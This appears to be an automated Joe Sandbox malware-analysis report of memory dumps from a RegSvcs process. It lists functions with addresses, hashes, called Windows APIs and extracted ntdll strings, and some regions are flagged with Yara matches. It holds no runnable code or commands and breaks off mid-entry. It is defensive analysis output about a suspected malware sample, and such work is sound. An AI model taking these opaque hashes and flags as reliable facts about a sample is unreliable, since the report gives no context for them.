Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: baae97d2e22fe299a1814fb06cb1de5e87595f3812f3ee2fb5f97ef35dee7aeb
Instruction ID: a7e04033e1584507f416b6ac7bc785decda058432ab7e88d85140bcac975d890
Opcode Fuzzy Hash: baae97d2e22fe299a1814fb06cb1de5e87595f3812f3ee2fb5f97ef35dee7aeb
Instruction Fuzzy Hash: B290022130150003D1417198941C6068089E7E1301F55D011E0454554CD91589565322

Uniqueness

Uniqueness Score: -1.00%

Function 019D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2CAA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d1dac4ac5e40a59f83cfae6ea7d7e35286b65be03494ffd9354f3b0aa6b57e96
Instruction ID: c7415a4bc985e60c3aa8f517099ac83f2b592eb115b67b2d9e8271fbc5ea26aa
Opcode Fuzzy Hash: d1dac4ac5e40a59f83cfae6ea7d7e35286b65be03494ffd9354f3b0aa6b57e96
Instruction Fuzzy Hash: 7890023120150402D10175D8940C646408997E0301F55D011A5064555EC66589916231

Uniqueness

Uniqueness Score: -1.00%

Function 019D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2C7A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ba0eb8b6ee82e524c1267abaff97126fe7b8adf43c0931db947af0b43223614
Instruction ID: 20dbc14ed201ffe47bbd19a5343b341d436260ed1c23e5f30a8e28f0d6349cb6
Opcode Fuzzy Hash: 9ba0eb8b6ee82e524c1267abaff97126fe7b8adf43c0931db947af0b43223614
Instruction Fuzzy Hash: B490023120158802D1117198C40C74A408997D0301F59C411A4464658DC69589917221

Uniqueness

Uniqueness Score: -1.00%

Function 019D2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2F9A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 321561678a1eaa5f2ba7652ecb63681165ecebc2ddfe9b58e96cbe03b4e0e38b
Instruction ID: 41ffd06cc0cceb3e1cbc0e72fffaabd6cff4d69e1427ae88a8893c9c74ad4851
Opcode Fuzzy Hash: 321561678a1eaa5f2ba7652ecb63681165ecebc2ddfe9b58e96cbe03b4e0e38b
Instruction Fuzzy Hash: 9990023120190402D1017198881C70B408997D0302F55C011A11A4555DC62589516671

Uniqueness

Uniqueness Score: -1.00%

Function 019D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2FBA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07ba84fc2ea74ea77a82a7d01e5b75d9b6c4df480e66218a23c0f6c30311a68b
Instruction ID: 95303270a3750000794b04297e5af45e15369bd07daf6f7896099cfdab6c625f
Opcode Fuzzy Hash: 07ba84fc2ea74ea77a82a7d01e5b75d9b6c4df480e66218a23c0f6c30311a68b
Instruction Fuzzy Hash: 5B90022160150042414171A8C84C9068089BBE1211755C121A09D8550DC55989655765

Uniqueness

Uniqueness Score: -1.00%

Function 019D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2FEA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d780387bf56ec68ae6aa6b59f83165ae1c1fe01d0a576c1769145048b0f9c7eb
Instruction ID: 100a3ff08f9fed570b143dba64db0638d7f21d3bb58f6ce5151d53dba32becf2
Opcode Fuzzy Hash: d780387bf56ec68ae6aa6b59f83165ae1c1fe01d0a576c1769145048b0f9c7eb
Instruction Fuzzy Hash: 53900221211D0042D20175A88C1CB07408997D0303F55C115A0194554CC91589615621

Uniqueness

Uniqueness Score: -1.00%

Function 019D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2F3A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca97120242843f64385af69623b1f4bc7afb54d4cdc0593133a897dd9541e881
Instruction ID: 2785b3b06548ee429e7c31611534dc8ee1858ad178504034ece32e0e2dc713c6
Opcode Fuzzy Hash: ca97120242843f64385af69623b1f4bc7afb54d4cdc0593133a897dd9541e881
Instruction Fuzzy Hash: BC90026134150442D1017198841CB064089D7E1301F55C015E10A4554DC619CD526226

Uniqueness

Uniqueness Score: -1.00%

Function 019D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2E8A

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dec3a76940a42f3ff99f1bb1d2646068b6afe28a6ae9f5a0c646817bb7d197a
Instruction ID: 131e80910e36d5b728d148f43d1c58c5aeaf0316574e5fcafcaeb098d1c7f073
Opcode Fuzzy Hash: 4dec3a76940a42f3ff99f1bb1d2646068b6afe28a6ae9f5a0c646817bb7d197a
Instruction Fuzzy Hash: 3990022160150502D1027198840C616408E97D0241F95C022A1064555ECA258A92A231

Uniqueness

Uniqueness Score: -1.00%

Function 019D2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2EAA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: de711a226e6d41ce086a7cd1a7d3917ee0bb734d372cc98f6e337c22d6195882
Instruction ID: 1ce423d81e0776ea22f69607d88a4f7d82742ba76759f1fea11e60e4d378e925
Opcode Fuzzy Hash: de711a226e6d41ce086a7cd1a7d3917ee0bb734d372cc98f6e337c22d6195882
Instruction Fuzzy Hash: F990027120150402D1417198840C746408997D0301F55C011A50A4554EC6598ED56765

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D

Strings

&EA, xrefs: 0041A642, 0041A64C

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A652 Relevance: 3.0, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
Instruction ID: 7c62ef2e9c5af210fca229e7e6612a7b87500e0c86a304205cdf82c4a5d7c339
Opcode Fuzzy Hash: 88f434622c633bc27af2c1bf28be723c31b971511076cdf1f3b3b1eadcf465e8
Instruction Fuzzy Hash: 48F0F0B1600204AFDB10EF64CC84EEB77A8EF88354F058659F96C5B301DA30EA20CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 58
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
Instruction ID: 2a8d323920ff48d12539d15ce7e09ae1efddcc1a1390eeb770c6affd5baa7734
Opcode Fuzzy Hash: ee4f53a35430c5c1d68b73efa173dcbe9667dd560f633fddae7690584aa10f9e
Instruction Fuzzy Hash: 7C01B971A4031877EB21A6958C03FFE776CAB40F55F05411DFF04BA1C2D7A9690546E9

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7B1 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
Instruction ID: c8ee3320983f7650268690fb7534173575ac561414675746a58643d4a70e0bde
Opcode Fuzzy Hash: a941718e14f809540f9cb1fcdd1daa2e2fcc0822d0c77d51cbeff7b1a986ba12
Instruction Fuzzy Hash: CFE09AB2605211AFD720EBA8EC858EBF32DEF803647218457F84887201C335D9A287B6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8

Memory Dump Source

Source File: 00000005.00000002.1726776282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5

Uniqueness

Uniqueness Score: -1.00%

Function 019D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019D2C24

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4275811e5c86334b5478cfbd1e4d3666de2265b4403d77d989913512dd1ba829
Instruction ID: 978dbf8df2f9a2cddc598815c9df17ea329a0f7fa6ac0e5aef6843d2a37edc68
Opcode Fuzzy Hash: 4275811e5c86334b5478cfbd1e4d3666de2265b4403d77d989913512dd1ba829
Instruction Fuzzy Hash: D0B09B71D015C5C5DA13E7B4460C717794477D0701F15C061D2070641F4738C5D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01A12349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UnloadEventTraceDepth, xrefs: 01A124C0
UseImpersonatedDeviceMap, xrefs: 01A1251C
FrontEndHeapDebugOptions, xrefs: 01A12489
RaiseExceptionOnPossibleDeadlock, xrefs: 01A12579
minkernel\ntdll\ldrinit.c, xrefs: 01A13187
MinimumStackCommitInBytes, xrefs: 01A12BB0
ExecuteOptions, xrefs: 01A125A0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A13176
ShutdownFlags, xrefs: 01A124A1
LdrpInitializeExecutionOptions, xrefs: 01A1317D
CFGOptions, xrefs: 01A12967
MaxLoaderThreads, xrefs: 01A124EC
@, xrefs: 01A12942
GlobalFlag2, xrefs: 01A12FC0
MaxDeadActivationContexts, xrefs: 01A12D82
GlobalFlag, xrefs: 01A12F3F, 01A13059
DisableExceptionChainValidation, xrefs: 01A1275F
TracingFlags, xrefs: 01A12549
@, xrefs: 01A12B74
DisableHeapLookaside, xrefs: 01A1246D

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: ce0b7a3b28e3b0a343ee10155429548b08e67de2a7bc84cb54da98291de864f5
Instruction ID: bd507a4d83ac7f4c020f79300376223a2091c3f937891d86b12875c753138e1d
Opcode Fuzzy Hash: ce0b7a3b28e3b0a343ee10155429548b08e67de2a7bc84cb54da98291de864f5
Instruction Fuzzy Hash: CB928F75604342AFE721DF28C880B6BB7E9BF84750F14492EFA98D7295D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 019C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Address of the debug info found in the active list., xrefs: 01A054AE, 01A054FA
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A054E2
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A0540A, 01A05496, 01A05519
double initialized or corrupted critical section, xrefs: 01A05508
corrupted critical section, xrefs: 01A054C2
8, xrefs: 01A052E3
Thread identifier, xrefs: 01A0553A
Critical section address, xrefs: 01A05425, 01A054BC, 01A05534
Critical section debug info address, xrefs: 01A0541F, 01A0552E
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A054CE
Invalid debug info address of this critical section, xrefs: 01A054B6
Critical section address., xrefs: 01A05502
undeleted critical section in freed memory, xrefs: 01A0542B
Thread is in a state in which it cannot own a critical section, xrefs: 01A05543

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 1230ab06b89ba0b73479a2c42756794a4ac929b017184d6abb9af9572e24c218
Instruction ID: e3884f2a05a8b7226d0af95dad1f16284c897e444055673bc3ce1ac828b092fc
Opcode Fuzzy Hash: 1230ab06b89ba0b73479a2c42756794a4ac929b017184d6abb9af9572e24c218
Instruction Fuzzy Hash: 65816BB1E40348EFEB21CF99D945BAEBBB9BF48B14F144159E508B7281D3B1A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 019C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A02602
RtlpResolveAssemblyStorageMapEntry, xrefs: 01A0261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A024C0
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A02498
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A02409
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A02506
@, xrefs: 01A0259B
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A022E4
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A02412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A025EB
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A02624

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 47742c8cdef15be473be0a674157d5b5ff4ffeb5c9a3018e26445f32d9913f58
Instruction ID: 2868b8c5d73f9cfa38d10cd080f0d66393559afcdebc1673f77a0a750d13cadc
Opcode Fuzzy Hash: 47742c8cdef15be473be0a674157d5b5ff4ffeb5c9a3018e26445f32d9913f58
Instruction Fuzzy Hash: F3027FB1D002299FDB31DB54CC84BDAB7B8AF54704F0041EAA64DA7281DB31AF84CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 01A38B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

SegmentHeap, xrefs: 01A38BE9
smss.exe, xrefs: 01A38B8B
svchost.exe, xrefs: 01A38B68
lsass.exe, xrefs: 01A38BA1
services.exe, xrefs: 01A38B96
DefaultBrowser_NOPUBLISHERID, xrefs: 01A38D00
runtimebroker.exe, xrefs: 01A38B73
csrss.exe, xrefs: 01A38B80
heapType, xrefs: 01A38BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01A38BD0

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 1fc353bb260d26aec5286c103a8fe44078696fd7edfe0bdc2f5079d637a19896
Instruction ID: 6f9db242ef02c1946d811f33e32bc752bb7b37ca60d56f8c0a9dbc58114858eb
Opcode Fuzzy Hash: 1fc353bb260d26aec5286c103a8fe44078696fd7edfe0bdc2f5079d637a19896
Instruction Fuzzy Hash: A451C0715143019FD729CF588888BABBBECEFD4654F144A2DB998C3240E778D508CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 01A40274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A404D3
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A4069F
Just reallocated block at %p to %Ix bytes, xrefs: 01A405F1
HEAP: , xrefs: 01A403A6, 01A404B5, 01A405DD, 01A40682, 01A406D9
About to reallocate block at %p to %Ix bytes, xrefs: 01A403BA
RtlReAllocateHeap, xrefs: 01A402BF, 01A40362
HEAP[%wZ]: , xrefs: 01A40399, 01A404A8, 01A405D0, 01A40675, 01A406CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A406EA

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1960000_RegSvcs.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 05796a6ccbb5d52af51ec6c0063b16418fb55665a3efa3874ffac00ec4bedcba
Instruction ID: 0195e86ac4cfb1b7830457be8c1e5a5b554920825b4fe00439aad521b60a058a
Opcode Fuzzy Hash: 05796a6ccbb5d52af51ec6c0063b16418fb55665a3efa3874ffac00ec4bedcba
Instruction Fuzzy Hash: CAD1DD35600682DFDB22EF68C540AEEBBF1FF89B14F088059F68A9B252C735D941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 01A189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A18A3D
HandleTraces, xrefs: 01A18C8F
VerifierDebug, xrefs: 01A18CA5
AVRF: -*- final list of providers -*- , xrefs: 01A18B8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A18A67
VerifierFlags, xrefs: 01A18C50
VerifierDlls, xrefs: 01A18CBD

Memory Dump Source

Source File: 00000005.00000002.1728273207.0000000001960000.00000040.00001000.00020000.00000000.sdmp, Offset: 01960000, based on PE: true

Joe Sandbox IDA Plugin

